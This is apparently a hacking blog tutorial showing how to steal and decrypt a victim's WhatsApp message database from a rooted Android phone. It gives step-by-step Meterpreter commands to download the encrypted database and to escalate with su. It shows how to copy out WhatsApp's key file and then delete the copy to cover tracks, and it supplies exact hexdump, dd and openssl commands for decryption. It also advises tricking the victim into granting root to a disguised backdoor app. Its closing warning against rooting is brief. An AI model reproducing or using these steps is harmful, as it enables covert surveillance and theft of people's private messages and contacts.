Welcome to my second post, this tutorial will explain how to extract and decrypt WhatsApp database from the Victim’s android system.
Yes the device should be rooted, there is no way around to do this remotely. I have been getting PM’s about this and can’t simply answer with the word SPOOF.
WhatsApp?
Almost everyone knows about it. It is a social android application, that’s enables the user to send free messages through the internet within seconds. The developers have made huge success and have high level and complex algorithms to encrypt and store the data, which changes with every update! And hence everyone uses it to send even the most personnel messages because they know it’s safe.
But is it ?
Yes is it actually very safe, however if the Victim is a fool or gullible, he/she is the main vulnerability here. I see many of the ‘experienced users’ root their android to explore/push to the system’s maximum limits. Following their footsteps the ‘inexperienced users’ also root/brick their android just to accomplish a minor task. They don’t even care about the Cons.
Anyway, lets execute the hack:
Step 1: Exploit and Gain Access to the Android!
This the easy part which you all like and are used-to.
Follow this guide to gain access to the Rooted android.
Once at meterpreter prompt, type check_root to make sure the device is rooted.
What Do We Require?
To decrypt the database, we need the database itself obviously and a key file in the /data folder, for which we need root to access the location. We cannot decrypt the database without the key (Until you want to spend more than 100 of years even with a mainframe!)
Step 2: Let’s Begin the Extraction Process for Database:
In meterpreter type:
- cd /
- cd /sdcard/WhatsApp
- ls (Print the current directory)
- cd Databases
- download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded, now we need to ‘Key of Decryption’
(Key file that holds the encryption keys cannot be retrieved any-more unless your phone is rooted)
(Key file that holds the encryption keys cannot be retrieved any-more unless your phone is rooted)
Step 3: Drop into the Shell:
As told before, but adding a little more detail here:
To decrypt the crypt8 files, we will need the key file. The key file stores two sets of decryption keys – the actual encryption key,K and an initialisation vector called IV . WhatsApp stores the key file in a secure location.
Extracting the key file, type:
- shell
- su (For Super User access or simply escalating privileges)
Here comes the tricky part, if the target is experienced and skilled, he must have installed the SuperSUapplication.
The application is responsible for holding the permissions whether which application can have access to root. It even holds all the logs.
So, we need to convince the Victim that the application is for boosting (or any other reason) his/her android system but at the same time requires root access to reach it’s maximum potential. Here is an excellent tutorial by bart that shows how to disguise a back-door application.
(—————“Victim, opens SuperSU and gives the permission”—————)
There are some cases with inexperienced and unskilled users:
- They don’t have a SuperSU application installed.
- They have not changed the setting for newly installed apps to PROMPTinstead of GRANT.
So in these cases we are really lucky!
Lets’ continue:
(If the android is not rooted you can navigate, but not copy or print the directory)
(If the android is not rooted you can navigate, but not copy or print the directory)
- cd /
- cd /data/data
- ls
- cd com.whatsapp
- ls
- cd files
- ls
- cp key /sdcard/Download
(Means copy the file ‘key’ to sdcard>Download folder)
Terminate the shell:
^C (Control+C)
^C (Control+C)
The key has been extracted from /data to /sdcard successfully!
Step 4: Again to Meterpreter:
Lets download the extracted key file to our root directory as we did for the encrypted database, type:
- cd /
- cd /sdcard/Download
- download key
- rm key (Make sure you do that to delete the key file)
The Key has been extracted to our root directory successfully!
Step 5: DECRYPT THE DATABASE!
Now that we have the database and the key, we can easily decrypt it with one of the two methods:
#1 With Simple Linux Commands:
With the two necessities in the root directory, open a terminal and type:
(Copy and Paste the commands one at a time, don’t make a a script out of it, or it will not work)
(Copy and Paste the commands one at a time, don’t make a a script out of it, or it will not work)
- hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316 > aes.txt
- hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134 > iv.txt
- dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
- openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
- gzip -cdq msgstore.gz > msgstore.db
If you even a little bash, then you can easily understand these commands. (Source: here)
If the 4th command does not work, follow:
- hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316
(Copy the printed text)
- hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134
(Copy the printed text)
- openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (Paste text from 1st command) -iv (Paste text from 2nd command) > msgstore.gz
These commands have bugs/errors in the result, so I would highly recommend to go for the #2 method.
#2 With Simple Windows WhatsApp Viewer Application:
The application has an excellent interface, from GitHub . Download the application from there.
Also, copy the key and database to windows, I hope you know how to do that.
- Open the application (in windows of course).
- Click FIle, then on ‘Decrypt .crypt8’
- In the dialogue box that appears, provide the Key file and Database.
- Click OK, you will see that a ‘msgstore.decrypted’ file has appeared at your desktop.
- Open it using the same application, go to ‘File’ then ‘Open’.
- Provide the Decrypted file, leave the Account name blank and for the ‘wa.db’, you can hack the phone again to extract this .db, to resolve contact names as mentioned in the cropped screenshot below.
- Click ‘OK’
And ‘Boom’ all the contacts with all the chats even the latest ones awaits your Click
The Tutorial Ends:
Now that you know how dangerous Rooting actually is, please, beware.
A cracker can not only perform this simple hack, he can even extract all the Wi-Fi passwords stored in your android, he can access everything, things that even you don’t have access to!! He may spread to your PConce you connect your android, hack your accounts (saved passwords) and even frame you. You just become a mere pawn to his further plans.
So, think twice before rooting and be really careful, while holding a rooted android in your hands.
Thank You!
0 Comments